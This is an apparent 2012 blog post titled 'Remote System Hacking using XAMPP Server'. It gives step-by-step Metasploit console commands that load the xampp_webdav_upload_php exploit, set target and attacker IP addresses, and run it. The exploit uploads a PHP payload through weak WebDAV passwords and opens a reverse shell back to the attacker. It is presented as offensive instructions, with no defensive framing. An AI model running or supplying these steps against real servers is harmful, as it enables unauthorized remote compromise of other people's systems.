Friday, December 28, 2012

Remote System Hacking using XAMPP Server


XAMPP WebDAV PHP Upload :

This module exploits weak WebDAV passwords on XAMPP servers. It uses supplied credentials to upload a PHP payload and execute it.
Exploit Targets :
  • xampp server having week webDAV passwords

Requirements :

Attacker : Backtrack
Victim : windows xp & windows 7

Step 1 : open terminal and type msfconsole metasploit framework.


Step 2 : use exploit/windows/http/xampp_webdav_upload_php



Step 3 : show payloads   (It shows us all the payloads comparable to exploits)



Step 4 : set RHOST 192.168.56.102 (target IP address )
Step 5 : set LHOST 192.168.56.101 (Attacker Machine IP address)
Step 6 : exploit


As we starts exploitation the reverse handler starts on attacker machine and the php payload is uploaded on the victim system .



Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)